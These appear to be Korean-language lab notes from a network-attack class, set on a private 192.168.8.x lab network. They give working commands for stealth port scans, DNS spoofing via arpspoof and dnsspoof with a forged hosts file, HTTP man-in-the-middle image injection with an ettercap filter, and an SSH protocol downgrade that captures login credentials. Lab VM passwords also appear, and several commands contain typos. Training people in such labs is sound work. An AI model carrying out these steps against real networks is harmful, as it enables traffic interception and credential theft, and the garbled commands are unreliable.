1.포트 스캔 nmap -sS 192.168.8.136 :TCP 스캔(스틸스 스캔) nmap -sX 192.168.8.136 :TCP 스캔(Xmas 스캔) nmap -sF 192.168.8.136 :TCP 스캔(FIN 스캔) nmap -sN 192.168.8.136 :TCP 스캔(NULL 스캔) nmap -sU 192.168.8.136 :UDP 스캔 -O OS 확인 -F framentation 단편화해서 보내기(방화벽 통과하기위해) 2. DNS spoofing victim : 외부 dns 로 설정할것. 내부 공격자보다 dns 서버의 정상적인 패킷이 먼저 응답하게 되면 공격이 되지 않음. @attacker 터미널1#arpspoof -t [victim_ip] [gateway_ip] 터미널2#fragrouter -B1 터미널3#service apache2 start 웹브라우저에서 웹서비스 확인하기 #cd /tmp #cat > hosts 210.109.3.65 *naver.com (네이버 dns요청시 강사ip 응답) 192.168.8.x *daum.net (다음요청시 kali ip 응답 ctrl+d #cat hosts #dnsspoof -f /tmp/hosts 대기 @ victim 명령프롬프트 창 > nslookup www.naver.com 웹브라우저로 www.naver.com 암호화 하지 않는 프로토콜 : HTTP (인코딩), DNS, TELNET, FTP, SMTP, POP3 arp, ICMP 3. HTTP MITM 필요한 시스템 : attacker (kali 1.0), vicitm(winxp,win7), centos(웹서버) @kali (1.0) 부팅 id:root , pw: toor @centos 압축 풀어서 vmware불러오기 부팅 ID: root, PW:qwer1234 각 시스템 IP, MAC주소 확인 kali1.0 192.168.8.137 00:0c:29:9c:be:b7 win7 192.168.8.135 00-0C-29-84-9A-B1 centos 192.168.8.138 00-0c-29-06-ff-bf gw 192.168.8.2 00-50-56-eb-31-16 보여줄 가짜그림을 다운로드 함. 작동할 웹서버에서 해야함. 웹서비스 활성화, 그림다운로드 centos인 경우) #service httpd service 웹브라우저로 원하는 그림을 다운로드하기 (디폴트 경로: 바탕화면) 그림 저장 위치 : /var/www/html/a.jpg kali인 경우) #service apache2 service 웹브라우저로 원하는 그림을 다운로드하기 (디폴트 경로: root) 그림 저장 위치 : /var/www/a.jpg 다운로드한 그림을 저장위치 -> 웹서비스 폴더로 이동해야함. img src='www.naver.com/abc.jpg' img src="www.naver.com/abc.jpg" img src="http://192.1688.137/a.jpg"www.naver.com/abc.jpg img src= 부분을 img src=http://192.168.8.137/a.jpg replace("a", "b"); replace("img src=", "img src=\"http://192.168.8.137/a.jpg\""); replace("img src=", "img src=\"http://192.168.8.137/a.jpg\""); 사용할 툴 : ethercap, etterfilter(컴파일러) html를 바꾸는 소스를 컴파일러해야함 -> ethercap 툴에서 이용 컴파일 gcc -o 결과물 원본소스 gcc -o a.sh a.txt etterfiltr -o 결과물명 원본소스명 filter.txt filter.sh 스위치 등 네트워크 장비의 원격접속을 telnet을 많이 사용함 하지만 telnet은 도청에 약함. SSH server -> /etc/ssh/sshd_config Protocol 2 -> ssh 헤더 Protool: SSH-2.0-Openssh Protocol 1 -> ssh 헤더 Protool: SSH-1.5-Openssh Protocol 1,2 -> ssh 헤더 Protool: SSH-??-Openssh 필요한 시스템: attacker(kali), ssh server(centos), ssh client(xp) ssh header를 가지고 와서 조작 (1.99 -> 1.5로) kali에 패킷을 조작하는 소스가 있음. 사용툴 : etterfilter, ettercap 공격대상 : ssh client192.168.8.136 , ssh server 192.168.8.138 @kali #ls /usr/share/ettercap ettercap.filter.ssh 파일 확인 #cd /usr/share/ettercap #ls etter.filter.ssh #cat etter.fiter.ssh #etterfilter -o ssh.sh etter.filter.ssh #ls ssh.sh #ettercap -G 1) netmask : 255.255.255.0 2) eth0인터페이스 인식 -> 메뉴 변경 3) 공격대상 hosts can하기. 4) scan한 hosts를 목록확인(list) 5) ssh.sh파일을 filter 적용 (메뉴 filter에서 불러오기) 6) 화면에서 target선정, ssh client 클릭 -> TARGET1 클릭 ssh server 클릭 -> TARGET2클릭 7) mitm- arp posioning (remote 스니핑만 체크) 8) 공격 sniff start 9) 대기 @victim ssh clinet 프로그램으로 ssh server에 접속. 패킷캡쳐한 파일을 보고 작동 버전학인 PD/PW확인됨.
-------------------
#vi filter.txt if (if.proto == TCP && tcp.src == 80) { replace("img src=", "img src=\"http://192.168.8.135/a.jpg\""); replace("IMG SRC=", "IMG SRC=\"http://192.168.8.135/a.jpg\""); msg("Replaced the pic. \n); } #etterfilter -o filter.sh filter.txt #ettercat -T -q -F filter.sh -M ARP /victim IP/ // -> 2.0에서는 token 문제일어남